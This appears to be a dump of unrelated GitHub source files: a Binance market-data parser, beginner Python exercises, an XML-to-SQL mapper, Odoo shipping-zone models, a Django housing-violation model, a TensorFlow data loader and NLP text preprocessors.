\n\n\tmarket_activity_map = {'TRADING': True}\n\n\t# {symbols_converting}\n\n\tdef join_basequote_exfrmt(self, base, quote):\n\t\texfrmt = f'{base}{quote}'\n\t\tif not self.basequote_map.get(exfrmt):\n\t\t\tself.basequote_map[exfrmt] = (base, quote)\n\t\treturn exfrmt\n\n\tdef parse_data_orderbook(self, msg):\n\t\ttm = dtHttp_to_dt64(msg['headers']['Date'])\n\t\treceived_at = np.datetime64(int(msg['tm'] * 1000), 'ms')\n\t\tmarket = msg['request_params']['market']\n\t\torderbook_raw = msg['msg']\n\t\tid = msg['msg'][\"lastUpdateId\"]\n\t\torderbook = {\n\t\t\t'id': id,\n\t\t\t'tm': tm,\n\t\t\t'bids': [[float(delta[0]), float(delta[1])] for delta in orderbook_raw['bids']],\n\t\t\t'asks': [[float(delta[0]), float(delta[1])] for delta in orderbook_raw['asks']],\n\t\t\t'received_at': received_at,\n\t\t}\n\t\treturn orderbook\n\n\tdef parse_data_markets(self, msg):\n\t\tmarkets_info_raw = msg['msg']['symbols']\n\t\tmarkets_info = {}\n\t\tfor market_info_raw in markets_info_raw:\n\t\t\tsymbol_exfrmt = market_info_raw[\"symbol\"]\n\t\t\tbase = market_info_raw[\"baseAsset\"]\n\t\t\tquote = market_info_raw[\"quoteAsset\"]\n\t\t\tself.update_basequote_map(symbol_exfrmt, base, quote)\n\t\t\tmarket = self.symbol_to_infrmt(symbol_exfrmt)\n\t\t\tif 'SPOT' not in market_info_raw['permissions']:\n\t\t\t\tcontinue\n\t\t\tmarkets_info[market] = {\n\t\t\t\t'market': market,\n\t\t\t\t'symbol': symbol_exfrmt,\n\t\t\t\t'base': base,\n\t\t\t\t'quote': quote,\n\t\t\t\t'created_at': None,\n\t\t\t\t'is_active': self.market_activity_map.get(market_info_raw['status'], False),\n\t\t\t\t'status': market_info_raw['status']\n\t\t\t}\n\n\t\treturn markets_info\n\n\tdef parse_data_trades(self, msg):\n\t\t\"\"\" aggtrade:{'a': 330231197,\n\t\t\t 'p': '0.07460300',\n\t\t\t 'q': '1.50790000',\n\t\t\t 'f': 393565003,\n\t\t\t 'l': 393565004,\n\t\t\t 'T': 1670096404349,\n\t\t\t 'm': True,\n\t\t\t 'M': True}\"\"\"\n\t\ttrades_raw = msg['msg']\n\t\tmarket = msg['request_params']['market']\n\n\t\ttrades = []\n\t\tfor trade_raw in trades_raw:\n\t\t\ttrade = {\n\t\t\t\t'id': trade_raw['id'],\n\t\t\t\t'tm': np.datetime64(trade_raw['time'], 'ms'),\n\t\t\t\t'Q': float(trade_raw['qty']),\n\t\t\t\t'R': float(trade_raw['price']),\n\t\t\t\t'buyer_maker': trade_raw['isBuyerMaker'],\n\t\t\t\t'custom': {\n\t\t\t\t\t'bid_id': None,\n\t\t\t\t\t'ask_id': None,\n\t\t\t\t\t'event_tm': None,\n\t\t\t\t\t'best_match': trade_raw['isBestMatch']\n\t\t\t\t}\n\t\t\t}\n\n\t\t\ttrades.append(trade)\n\t\treturn trades\n\n\tdef parse_data_tickers_C(self, msg):\n\t\ttickers_raw = msg['msg']\n\t\tif isinstance(tickers_raw, dict):\n\t\t\treturn float(tickers_raw['price'])\n\t\ttickers = []\n\t\tfor ticker_raw in tickers_raw:\n\t\t\tticker = {\n\t\t\t\t'market': self.symbol_to_infrmt(ticker_raw['symbol']),\n\t\t\t\t'C': float(ticker_raw['price'])\n\t\t\t}\n\t\t\ttickers.append(ticker)\n\t\treturn tickers\n\n\tdef parse_data_tickers_CHL(self, msg):\n\t\t# each 24hr ticker entry carries lastPrice/highPrice/lowPrice among other fields\n\t\ttickers_raw = msg['msg']\n\t\ttickers = []\n\t\tfor ticker_raw in tickers_raw:\n\t\t\tticker = {\n\t\t\t\t'market': self.symbol_to_infrmt(ticker_raw['symbol']),\n\t\t\t\t'C': float(ticker_raw['lastPrice']),\n\t\t\t\t'H': float(ticker_raw['highPrice']),\n\t\t\t\t'L': float(ticker_raw['lowPrice'])\n\t\t\t}\n\t\t\ttickers.append(ticker)\n\t\treturn tickers\n\n\tdef parse_data_ohlcv(self, msg):\n\t\t'''\n\t\t[\n\t\t [\n\t\t\t1499040000000,\t // 0\tOpen time\n\t\t\t\"0.01634790\",\t // 1\tOpen\n\t\t\t\"0.80000000\",\t // 2\tHigh\n\t\t\t\"0.01575800\",\t // 3\tLow\n\t\t\t\"0.01577100\",\t // 4\tClose\n\t\t\t\"148976.11427815\", // 5\tVolume\n\t\t\t1499644799999,\t // 6\tClose time\n\t\t\t\"2434.19055334\",\t// 7\tQuote asset volume\n\t\t\t308,\t\t\t\t// 8\tNumber of trades\n\t\t\t\"1756.87402397\",\t// 9\tTaker buy base asset volume\n\t\t\t\"28.46694368\",\t // 10\tTaker buy quote asset volume\n\t\t\t\"17928899.62484339\" // 11\tIgnore.\n\t\t ]\n\t\t]\n\t\t'''\n\t\tohlcv_raw = msg['msg']\n\t\tohlcv = []\n\t\tfor kline_raw in ohlcv_raw:\n\t\t\tkline = 
{\n\t\t\t\t'open_tm': kline_raw[0],\n\t\t\t\t'close_tm': kline_raw[6],\n\t\t\t\t'o': float(kline_raw[1]),\n\t\t\t\t'h': float(kline_raw[2]),\n\t\t\t\t'l': float(kline_raw[3]),\n\t\t\t\t'c': float(kline_raw[4]),\n\t\t\t\t'qv': float(kline_raw[7]),\n\t\t\t\t'bv': float(kline_raw[5]),\n\t\t\t\t'custom': {\n\t\t\t\t\t'trades_count': kline_raw[8],\n\t\t\t\t\t'bv_tacker_buy': float(kline_raw[9]),\n\t\t\t\t\t'qv_tacker_buy': float(kline_raw[10]),\n\t\t\t\t}\n\t\t\t}\n\t\t\tohlcv.append(kline)\n\t\treturn ohlcv\n\n\tdef indentify_error_tp(self, msg):\n\t\t# raw = msg['msg']\n\t\tstatus_code = msg['status_code']\n\t\tif status_code == 0:\n\t\t\treturn 'network_down'\n\t\tif status_code == -2:\n\t\t\treturn 'timeout_error'\n\t\tif status_code == 403:\n\t\t\treturn 'FAW_lock'\n\t\tif status_code == 429:\n\t\t\treturn 'too_many_requests'\n\t\tif status_code==418:\n\t\t\treturn 'too_many_requests'\n\t\tif status_code == 503:\n\t\t\treturn 'service_unavailable'\n\t\tif status_code >= 500:\n\t\t\treturn 'repeat'\n\n\t\tif isinstance(msg['msg'], dict):\n\t\t\terr_code = msg['msg'].get('code')\n\n\t\t\tif err_code:\n\t\t\t\tif err_code == -1000:\n\t\t\t\t\treturn 'repeat'\n\t\t\t\tif err_code == -1001:\n\t\t\t\t\treturn 'repeat'\n\t\t\t\tif err_code == -1003:\n\t\t\t\t\treturn 'too_many_requests'\n\t\t\t\tif err_code == -1004:\n\t\t\t\t\treturn 'repeat'\n\t\t\t\tif err_code == -1121:\n\t\t\t\t\treturn 'invalid_market'\n\t\treturn 'unknown_error'\n\n\n\tdef parse_decode_error(self, msg):\n\t\tpass\n\n\n\tdef return_parsing_error(self, msg, E):\n\t\treturn {\n\t\t'tp': 'parsing_error',\n\t\t'exception': E,\n\t\t'raw': msg,\n\t\t'tm': msg['tm']\n\t\t}\n\n# def symbol_to_infrmt(self, market):\n#\treturn '-'.join(reversed(market.split('-')))\n\n\n\n\n\n\n","repo_name":"iss2g/test-task","sub_path":"app/binance_interface/rest/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":24389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"73901563593","text":"# pattern problem\n\n\nnum = int(input(\"Enter the number: \"))\nprint(\"PRESS\")\ndecide = int(input(\"1. Upper Triangle\\n0. 
Lower Triangle\\n\"))\n\nnew = bool(decide)\n\nif new == True:\n # print(\"you entered 1\")\n for i in range(num):\n for j in range(i+1):\n print(\"# \", end=\"\")\n print()\n \nelif new == False:\n # print(\"you are in 2\")\n for i in range(num):\n for j in range(num-i):\n print(\"# \", end=\"\")\n print()\n\nelse:\n print(\"invalid!!\")\n","repo_name":"ujjwalbhandarii/RAW","sub_path":"py/exercise/PatternProblem.py","file_name":"PatternProblem.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"72532924871","text":"class Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None\r\n\r\n\r\nclass SingleLinkedList:\r\n def __init__(self):\r\n self.head = None\r\n\r\n def insertBeginning(self, data):\r\n nb = Node(data)\r\n nb.next = self.head\r\n self.head = nb\r\n\r\n def insertAtPosition(self, data, position):\r\n np = Node(data)\r\n temp = self.head\r\n for i in range(position-1):\r\n temp = temp.next\r\n np.data = data\r\n np.next = temp.next\r\n temp.next = np\r\n\r\n def insertAtEnd(self, data):\r\n ne = Node(data)\r\n temp = self.head\r\n while temp.next:\r\n temp = temp.next\r\n temp.next = ne\r\n\r\n def display(self):\r\n if self.head is None:\r\n print(\"The List is Empty\")\r\n else:\r\n temp = self.head\r\n while temp:\r\n if temp.next is not None:\r\n print(temp.data, \"--->\", end=\" \")\r\n temp = temp.next\r\n else:\r\n print(temp.data)\r\n temp = temp.next\r\n\r\n\r\nL = SingleLinkedList()\r\nn1 = Node(10)\r\nL.head = n1\r\nn2 = Node(20)\r\nL.head.next = n2\r\nL.display()\r\n\r\nn = int(input(\"Enter the number of new elements to be added to the list:\"))\r\nprint(\"1-Insert Element at the beginning of the List\")\r\nprint(\"2-Insert Element at the end of the List\")\r\nprint(\"3-Insert Element at a specified position in the List\")\r\nwhile n != 0:\r\n choice = int(input(\"Enter your Choice:\"))\r\n if choice == 1:\r\n element = int(input(\"Enter the element to be inserted at the beginning:\"))\r\n L.insertBeginning(element)\r\n L.display()\r\n elif choice == 2:\r\n element = int(input(\"Enter the element to be inserted at the end:\"))\r\n L.insertAtEnd(element)\r\n L.display()\r\n elif choice == 3:\r\n element = int(input(\"Enter the element to be inserted at the specified position:\"))\r\n posn = int(input(\"Enter the position to insert the element:\"))\r\n L.insertAtPosition(element, posn)\r\n L.display()\r\n else:\r\n print(\"Enter the correct option\")\r\n\r\n n -= 1\r\n","repo_name":"Aaronphilip2003/Data-Structs-Algo-PYTHON","sub_path":"Insertion-N-times.py","file_name":"Insertion-N-times.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11560488227","text":"# -*- coding:utf-8 -*-\nimport re\nfrom xml.dom.minidom import parse, Node\nimport xml.dom.minidom\nfrom dbutil import DBUtils\nfrom model import *\n\n\"\"\"\n\n\n\n\n\"\"\"\n\n\nclass Constant:\n id = 'id'\n namespace = 'namespace'\n mapper = 'mapper'\n label_sql = 'sql'\n label_where = 'where'\n label_if = 'if'\n label_for = 'for'\n label_include = 'include'\n label_update = 'update'\n label_delete = 'delete'\n label_select = 'select'\n label_insert = 'insert'\n op_label = [label_delete, label_insert, label_select, label_update]\n\n\nclass XmlNode:\n\n def __init__(self, namespace=None, id=None, op=None, attrs=None, vars=None, data=None):\n self.namespace = namespace\n self.id = id\n 
        self.op = op\n        self.attrs = attrs\n        self.vars = vars\n        self.data = data\n\n    def __str__(self):\n        return '[id: %s、op: %s、attrs: %s、vars: %s、 data: %s]' % (self.id, self.op, self.attrs, self.vars, self.data)\n\n\nclass XmlParsingError(Exception):\n\n    def __init__(self, info):\n        super(XmlParsingError, self).__init__(info)\n\n\nclass MapperParse:\n\n    def __init__(self, xmls):\n        self.xmls = xmls\n        self.mappers = {}\n\n    def parse(self):\n        for xPath in self.xmls:\n            dom_tree = xml.dom.minidom.parse(xPath)\n            root = dom_tree.documentElement\n\n            if root.hasAttribute(Constant.namespace):\n                namespace = root.getAttribute(Constant.namespace)\n            else:\n                raise XmlParsingError('Empty namespace!')\n\n            child_nodes = root.childNodes\n            for node in child_nodes:\n                xmlNode = XmlNode()\n                xmlNode.namespace = namespace\n                # select/insert/update/delete\n                if node.nodeType == Node.ELEMENT_NODE and node.nodeName in Constant.op_label:\n                    xmlNode.op = node.nodeName\n                    if not node.hasAttribute(Constant.id):\n                        raise XmlParsingError('id is null!')\n                    xmlNode.id = node.getAttribute(Constant.id)\n                    attrs = node.attributes\n                    # parse attrs\n                    if attrs:\n                        m_attrs = {}\n                        for idx in range(attrs.length):\n                            if attrs.item(idx).name != Constant.id:\n                                m_attrs[attrs.item(idx).name] = attrs.item(idx).value\n                        xmlNode.attrs = m_attrs\n\n                    xmlNode.data = node.childNodes\n                    self.mappers[xmlNode.namespace + '.' + xmlNode.id] = xmlNode\n\n\nclass EasyDB:\n\n    def __init__(self, path, xmls):\n        self.dbutil = DBUtils()\n        self.dbutil.set_instance(path)\n        self.mp = MapperParse(xmls)\n        self.mp.parse()\n\n    def exec(self, sql, data=None):\n        return self.dbutil.execute(sql, data)\n\n\npath = '../../resources/stock.db3'\nxmls = [\"stock_map.xml\"]\ndb = EasyDB(path, xmls)\n\n\ndef mapper(*args, **kargs):\n    global db\n\n    def decorator(func):\n        node = db.mp.mappers.get(func.__qualname__)\n        if not node:\n            raise XmlParsingError('No method mapper: <%s>' % func.__qualname__)\n\n        def _invoke(**margs):\n            strSql = ''\n            for n in node.data:\n                if n.nodeType == Node.TEXT_NODE:\n                    data = n.data.strip()\n                    if len(data) > 1:\n                        strSql += data\n            parms = re.findall(r'#{(.+?)}', strSql)\n            pas = []\n            for p in parms:\n                if not margs.get(p.strip()):\n                    raise Exception('Missing value for SQL parameter: %s' % p)\n                # prevent SQL injection\n                strSql = strSql.replace('#{' + p + '}', \"?\")\n                pas.append(margs.get(p.strip()))\n            return db.exec(sql=strSql, data=tuple(pas))\n\n        return _invoke\n\n    return decorator
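\n\n# Example (illustrative): a mapped statement \"select * from tb_stock_info where id=#{id}\"\n# called with id=2 is rewritten by _invoke to \"select * from tb_stock_info where id=?\"\n# and executed with the bound parameter tuple (2,).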
\n\ndef test():\n    class Mapper:\n\n        @mapper(sql=\"select * from tb_stock_info\")\n        def selecTest(**kw): pass\n\n    class Stock(Model):\n        id = Int('id')\n        code = Varchar('code')\n\n    st = Stock(id=2, code='603161')\n    rs = Mapper.selecTest(**st)\n    print()\n    print(\"Result: \", rs)\n","repo_name":"bingdyee/pybatis","sub_path":"v1/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"}
+{"seq_id":"26652606611","text":"from odoo import fields, models, api, _\nfrom odoo.exceptions import UserError, Warning\nimport re\n\n\nclass ShippingZone(models.Model):\n    \"\"\"\n    Models zones that group different postal codes in a country given a transporter\n    \"\"\"\n    _name = 'shipping.zone'\n\n    name = fields.Char(string='Name')\n    transporter_id = fields.Many2one('res.partner', string='Transporter', domain=[('is_transporter', '=', True)])\n    country_id = fields.Many2one('res.country', string='Country')\n    postal_code_ids = fields.One2many('postal.code.range', 'shipping_zone_id', string='Postal Codes')\n    shipping_cost_ids = fields.One2many('shipping.cost', 'shipping_zone_id', string='Shipping costs')\n\n    def is_postal_code_in_zone(self, code_to_check):\n        \"\"\"\n        Checks if the given postal code is in this zone.\n        NOTE: We assume code_to_check fits the country's postal code format\n\n        Parameters\n        ----------\n        code_to_check:\n            string with the postal code to check\n\n        Returns\n        -------\n        If code_to_check in zone postal codes\n        \"\"\"\n        for postal_code_range in self.postal_code_ids:\n            if postal_code_range.is_postal_code_in_range(code_to_check):\n                return True\n        return False\n\n\nclass PostalCodeRange(models.Model):\n    \"\"\"\n    Models a range of postal codes. It is related to a location_zone.\n    \"\"\"\n    _name = 'postal.code.range'\n\n    first_code = fields.Char(string='First', size=10, required=True)\n    last_code = fields.Char(string='Last', size=10, required=True)\n    shipping_zone_id = fields.Many2one('shipping.zone', string='Zone')\n    postal_code_format_id = fields.Many2one(\n        string='Postal code format',\n        related='shipping_zone_id.country_id.postal_code_format_id', readonly=True\n    )\n\n    def is_postal_code_in_range(self, code_to_check):\n        \"\"\"\n        Checks if the given postal code is in this postal_code_range.\n\n        Parameters\n        ----------\n        code_to_check:\n            string with the postal code to check\n\n        Returns\n        -------\n        If code_to_check in [first_code, last_code]\n        \"\"\"\n        # Lexicographic containment, e.g. first_code='28000', last_code='28999' contains '28500'.\n        return self.first_code <= code_to_check <= self.last_code\n\n    @api.multi\n    @api.constrains('first_code', 'last_code')\n    def check_postal_codes(self):\n        \"\"\"\n        Checks if the range is correctly created:\n        - each code matches the country's postal code format\n        - first_code <= last_code\n        \"\"\"\n        for postal_code_range in self:\n            if not re.match(postal_code_range.postal_code_format_id.regex, postal_code_range.first_code):\n                raise UserError(_(\n                    'Not valid postal code value: \"%s\". 
Please, try using one like this \"%s\"') % (\n postal_code_range.last_code, postal_code_range.postal_code_format_id.postal_code_sample\n ))\n if postal_code_range.first_code > postal_code_range.last_code:\n raise Warning(_('Error!:: End code is lower than first code.'))\n\n\nclass PostalCodeFormat(models.Model):\n \"\"\"\n Models the format that a Postal Code must have\n \"\"\"\n _name = 'postal.code.format'\n\n name = fields.Char(string='Name')\n country_ids = fields.One2many('res.country', 'postal_code_format_id', string='Country')\n regex = fields.Char(\n string='Regular expression',\n help='With this regular expression you will tell how is the format of the postal code.'\n )\n postal_code_sample = fields.Char(\n string='Code Sample',\n help='An example of how the postal code format must be.'\n )\n\n @api.multi\n @api.constrains('regex', 'postal_code_sample')\n def check_postal_code_sample(self):\n \"\"\"\n Checks if the postal_code_sample chosen fits with the regex\n \"\"\"\n for code_format in self:\n if not re.match(code_format.regex, code_format.postal_code_sample):\n raise UserError(_(\n 'Not valid postal code sample: \"%s\"') % code_format.postal_code_sample)\n\n\nclass Country(models.Model):\n _inherit = 'res.country'\n\n shipping_zone_ids = fields.One2many('shipping.zone', 'country_id', string='Zone')\n postal_code_format_id = fields.Many2one(\n 'postal.code.format',\n string='Postal Code Format'\n )\n\n","repo_name":"Naferreyra/CMNT_004_15","sub_path":"project-addons/shipping_costs/models/zone.py","file_name":"zone.py","file_ext":"py","file_size_in_byte":4652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"36238451199","text":"from django.db import models\nfrom datasets.utils.BaseDatasetModel import BaseDatasetModel\nfrom core.utils.transform import from_csv_file_to_gen\nfrom datasets.utils.validation_filters import is_null, is_older_than\nfrom django.dispatch import receiver\nfrom core.tasks import async_download_and_update\nfrom datasets import models as ds\nimport logging\nlogger = logging.getLogger('app')\n\n\nclass HPDViolation(BaseDatasetModel, models.Model):\n class Meta:\n indexes = [\n models.Index(fields=['bbl', '-approveddate']),\n models.Index(fields=['-approveddate']),\n ]\n\n API_ID = 'wvxf-dwi5'\n QUERY_DATE_KEY = 'approveddate'\n EARLIEST_RECORD = '1933-01-01'\n\n download_endpoint = \"https://data.cityofnewyork.us/api/views/wvxf-dwi5/rows.csv?accessType=DOWNLOAD\"\n\n violationid = models.IntegerField(\n primary_key=True, blank=False, null=False)\n bbl = models.ForeignKey('Property', db_column='bbl', db_constraint=False,\n on_delete=models.SET_NULL, null=True, blank=False)\n bin = models.ForeignKey('Building', db_column='bin', db_constraint=False,\n on_delete=models.SET_NULL, null=True, blank=True)\n buildingid = models.ForeignKey('HPDBuildingRecord', db_column='buildingid', db_constraint=False,\n on_delete=models.SET_NULL, null=True, blank=True)\n registrationid = models.IntegerField(blank=True, null=True)\n boroid = models.TextField(blank=True, null=True)\n borough = models.TextField(db_index=True)\n housenumber = models.TextField()\n lowhousenumber = models.TextField(blank=True, null=True)\n highhousenumber = models.TextField(blank=True, null=True)\n streetname = models.TextField(blank=True, null=True)\n streetcode = models.TextField(blank=True, null=True)\n postcode = models.TextField(blank=True, null=True)\n apartment = models.TextField(blank=True, null=True)\n story = models.TextField(blank=True, 
null=True)\n block = models.TextField(blank=True, null=True)\n lot = models.TextField(blank=True, null=True)\n class_name = models.TextField(blank=True, null=True)\n inspectiondate = models.DateField(blank=True, null=True)\n approveddate = models.DateField(blank=True, null=True)\n originalcertifybydate = models.DateField(blank=True, null=True)\n originalcorrectbydate = models.DateField(blank=True, null=True)\n newcertifybydate = models.DateField(blank=True, null=True)\n newcorrectbydate = models.DateField(blank=True, null=True)\n certifieddate = models.DateField(blank=True, null=True)\n ordernumber = models.TextField(blank=True, null=True)\n novid = models.IntegerField(blank=True, null=True)\n novdescription = models.TextField(blank=True, null=True)\n novissueddate = models.DateField(blank=True, null=True)\n currentstatusid = models.IntegerField(blank=True, null=True)\n currentstatus = models.TextField(db_index=True, blank=True, null=True)\n currentstatusdate = models.DateField(db_index=True, blank=True, null=True)\n novtype = models.TextField(blank=True, null=True)\n violationstatus = models.TextField(db_index=True, blank=True, null=True)\n latitude = models.DecimalField(\n decimal_places=8, max_digits=32, blank=True, null=True)\n longitude = models.DecimalField(\n decimal_places=8, max_digits=32, blank=True, null=True)\n communityboard = models.TextField(blank=True, null=True)\n councildistrict = models.IntegerField(blank=True, null=True)\n censustract = models.TextField(blank=True, null=True)\n nta = models.TextField(blank=True, null=True)\n rentimpairing = models.TextField(default='', blank=True, null=True)\n\n slim_query_fields = [\"violationid\", \"bbl\", \"approveddate\"]\n\n @classmethod\n def create_async_update_worker(self, endpoint=None, file_name=None):\n async_download_and_update.delay(\n self.get_dataset().id, endpoint=endpoint, file_name=file_name)\n\n @classmethod\n def download(self, endpoint=None, file_name=None):\n return self.download_file(self.download_endpoint, file_name=file_name)\n\n @classmethod\n def pre_validation_filters(self, gen_rows):\n for row in gen_rows:\n if is_null(row['violationid']):\n continue\n yield row\n\n # trims down new update files to preserve memory\n # uses original header values\n @classmethod\n def update_set_filter(self, csv_reader, headers):\n for row in csv_reader:\n if headers.index('InspectionDate') and is_older_than(row[headers.index('InspectionDate')], 2):\n continue\n yield row\n\n @classmethod\n def transform_self(self, file_path, update=None):\n return self.pre_validation_filters(from_csv_file_to_gen(file_path, update))\n\n @classmethod\n def seed_or_update_self(self, **kwargs):\n logger.info(\"Seeding/Updating {}\", self.__name__)\n self.seed_with_upsert(**kwargs)\n\n @classmethod\n def annotate_properties(self):\n self.annotate_all_properties_standard()\n\n def __str__(self):\n return str(self.violationid)\n\n\n@receiver(models.signals.post_save, sender=HPDViolation)\ndef annotate_property_on_save(sender, instance, created, **kwargs):\n if created == True:\n try:\n\n annotation = sender.annotate_property_standard(\n instance.bbl.propertyannotation)\n annotation.save()\n except Exception as e:\n print(e)\n","repo_name":"ANHD-NYC-CODE/anhd-council-backend","sub_path":"datasets/models/HPDViolation.py","file_name":"HPDViolation.py","file_ext":"py","file_size_in_byte":5466,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"22618602094","text":"import os\nfrom time import 
sleep \n\n# code before fork() is executed only by the original (parent) process\nprint(\"*******************\")\n# memory created before fork() is inherited by the child process as well\na = 1\n# create a new process\npid = os.fork()\n\nif pid < 0:\n    print(\"failed to create process\")\n# part executed only by the child process\nelif pid == 0:\n    sleep(1)\n    print(\"a = \",a)\n    print(\"newly created process\")\n# part executed only by the parent process\nelse:\n    sleep(5)\n    print(\"original process\")\n\n# code outside the if block runs in both parent and child\nprint(\"program finished\")","repo_name":"wangyuhui12/AID1804","sub_path":"pythonNet/day4/fork.py","file_name":"fork.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"16459083032","text":"# -*- coding: utf-8 -*-\n\nfrom functools import partial\nimport tensorflow as tf\n\n\n@tf.function\ndef parse_tfrecord(example_proto, features=None, labels=None, patch_shape=None):\n    keys = features + labels\n    columns = [\n        tf.io.FixedLenFeature(shape=patch_shape, dtype=tf.float32) for k in keys\n    ]\n    proto_struct = dict(zip(keys, columns))\n    inputs = tf.io.parse_single_example(example_proto, proto_struct)\n    inputs_list = [inputs.get(key) for key in keys]\n    stacked = tf.stack(inputs_list, axis=0)\n    stacked = tf.transpose(stacked, [1, 2, 0])\n    return tf.data.Dataset.from_tensors(stacked)\n\n\n@tf.function\ndef to_tuple(dataset, n_features=None):\n    features = dataset[:, :, :, :n_features]\n    labels = dataset[:, :, :, n_features:]\n    labels_inverse = tf.math.abs(labels - 1)\n    labels = tf.concat([labels_inverse, labels], axis=-1)\n    return features, labels\n\n\n@tf.function\ndef random_transform(dataset):\n    x = tf.random.uniform(())\n\n    if x < 0.10:\n        dataset = tf.image.flip_left_right(dataset)\n    elif tf.math.logical_and(x >= 0.10, x < 0.20):\n        dataset = tf.image.flip_up_down(dataset)\n    elif tf.math.logical_and(x >= 0.20, x < 0.30):\n        dataset = tf.image.flip_left_right(tf.image.flip_up_down(dataset))\n    elif tf.math.logical_and(x >= 0.30, x < 0.40):\n        dataset = tf.image.rot90(dataset, k=1)\n    elif tf.math.logical_and(x >= 0.40, x < 0.50):\n        dataset = tf.image.rot90(dataset, k=2)\n    elif tf.math.logical_and(x >= 0.50, x < 0.60):\n        dataset = tf.image.rot90(dataset, k=3)\n    elif tf.math.logical_and(x >= 0.60, x < 0.70):\n        dataset = tf.image.flip_left_right(tf.image.rot90(dataset, k=2))\n    else:\n        pass\n    return dataset\n\n\n@tf.function\ndef flip_inputs_up_down(inputs):\n    return tf.image.flip_up_down(inputs)\n\n\n@tf.function\ndef flip_inputs_left_right(inputs):\n    return tf.image.flip_left_right(inputs)\n\n\n@tf.function\ndef transpose_inputs(inputs):\n    flip_up_down = tf.image.flip_up_down(inputs)\n    transpose = tf.image.flip_left_right(flip_up_down)\n    return transpose\n\n\n@tf.function\ndef rotate_inputs_90(inputs):\n    return tf.image.rot90(inputs, k=1)\n\n\n@tf.function\ndef rotate_inputs_180(inputs):\n    return tf.image.rot90(inputs, k=2)\n\n\n@tf.function\ndef rotate_inputs_270(inputs):\n    return tf.image.rot90(inputs, k=3)\n\n\ndef get_dataset(files, features, labels, patch_shape, batch_size,\n                buffer_size=1000, training=False, **kwargs):\n    parser = partial(parse_tfrecord,\n                     features=features,\n                     labels=labels,\n                     patch_shape=patch_shape\n                     )\n\n    split_data = partial(to_tuple, n_features=len(features))\n\n    dataset = tf.data.TFRecordDataset(files, compression_type='GZIP')\n    dataset = dataset.interleave(parser, num_parallel_calls=tf.data.experimental.AUTOTUNE)\n\n    if training:\n        dataset = dataset.shuffle(buffer_size, reshuffle_each_iteration=True).batch(batch_size) \\\n            .map(random_transform, num_parallel_calls=tf.data.experimental.AUTOTUNE) \\\n            .map(split_data, num_parallel_calls=tf.data.experimental.AUTOTUNE)\n    else:\n        dataset = dataset.batch(batch_size).map(split_data, num_parallel_calls=tf.data.experimental.AUTOTUNE)\n\n    return dataset\n
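\n\n# Hypothetical usage sketch (file names, band names and shapes are illustrative only):\n# train_ds = get_dataset(['train-00000.tfrecord.gz'], features=['B2', 'B3', 'B4'],\n#                        labels=['water'], patch_shape=[256, 256], batch_size=16, training=True)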
","repo_name":"Servir-Mekong/surface-water-map-unet","sub_path":"model/dataio.py","file_name":"dataio.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"27"}
+{"seq_id":"26850184605","text":"from __future__ import annotations\n\nimport abc\nimport re\nimport string\nimport sys\nfrom typing import Any, Optional\nimport unicodedata\n\nfrom explainaboard.utils.tokenizer import MLQAMixTokenizer, SingleSpaceTokenizer\n\n\nclass Preprocessor(abc.ABC):\n    def __init__(\n        self, language: str | None = None, resources: Optional[dict[str, Any]] = None\n    ):\n        self.language = language\n        self.resources = resources or self.default_resources()\n\n    def set_language(self, language: str) -> Preprocessor:\n        self.language = language\n        return self\n\n    def default_resources(self) -> dict[str, Any]:\n        \"\"\"Returns default features for this processor.\"\"\"\n        return {}\n\n    @abc.abstractmethod\n    def process(self, s: str, resources: dict[str, Any]) -> str:\n        \"\"\"\n        Get default processing function\n        :return:\n        \"\"\"\n        ...\n\n    def __call__(self, text: str) -> str:\n        \"\"\"\n        preprocess text\n        :param text: text to be preprocessed\n        :return: preprocessed text\n        \"\"\"\n        return self.process(text, self.resources)\n\n\nclass MapPreprocessor(Preprocessor):\n    def default_resources(self) -> dict:\n        \"\"\"Returns default features for this processor.\"\"\"\n        return {\"dictionary\": {}}\n\n    def process(self, s: str, resources: dict[str, Any]) -> str:\n        return resources['dictionary'].get(s, s)\n\n\nclass KGMapPreprocessor(Preprocessor):\n    def default_resources(self) -> dict:\n        \"\"\"Returns default features for this processor.\"\"\"\n        return {\"dictionary\": {}}\n\n    def process(self, s: str, resources: dict[str, Any]) -> str:\n        return (\n            resources['dictionary'][s][\"label\"] if s in resources['dictionary'] else s\n        )\n\n\nclass ExtractiveQAPreprocessor(Preprocessor):\n    \"\"\"\n    A preprocessor to process answers in extractive QA tasks.\n    Currently it is based on the MLQA paper.\n    \"\"\"\n\n    PUNCT = {\n        chr(i)\n        for i in range(sys.maxunicode)\n        if unicodedata.category(chr(i)).startswith('P')\n    }.union(string.punctuation)\n    WHITESPACE_LANGS = ['en', 'es', 'hi', 'vi', 'de', 'ar']\n    MIXED_SEGMENTATION_LANGS = ['zh']\n\n    ss_tokenizer = SingleSpaceTokenizer()\n    mlqa_tokenizer = MLQAMixTokenizer()\n\n    def default_resources(self) -> dict:\n        \"\"\"Returns default features for this processor.\"\"\"\n        return {\"language\": self.language}\n\n    def process(self, s: str, resources: dict[str, Any]) -> str:\n        \"\"\"Lower text and remove punctuation, articles and extra whitespace.\"\"\"\n\n        language = resources['language']\n\n        def remove_articles(text: str, lang: str) -> str:\n            if lang in ['en', 'eng']:\n                return re.sub(r'\\b(a|an|the)\\b', ' ', text)\n            elif lang in ['es', 'spa']:\n                return re.sub(r'\\b(un|una|unos|unas|el|la|los|las)\\b', ' ', text)\n            elif lang in ['vi', 'vie']:\n                return re.sub(r'\\b(của|là|cái|chiếc|những)\\b', ' ', text)\n            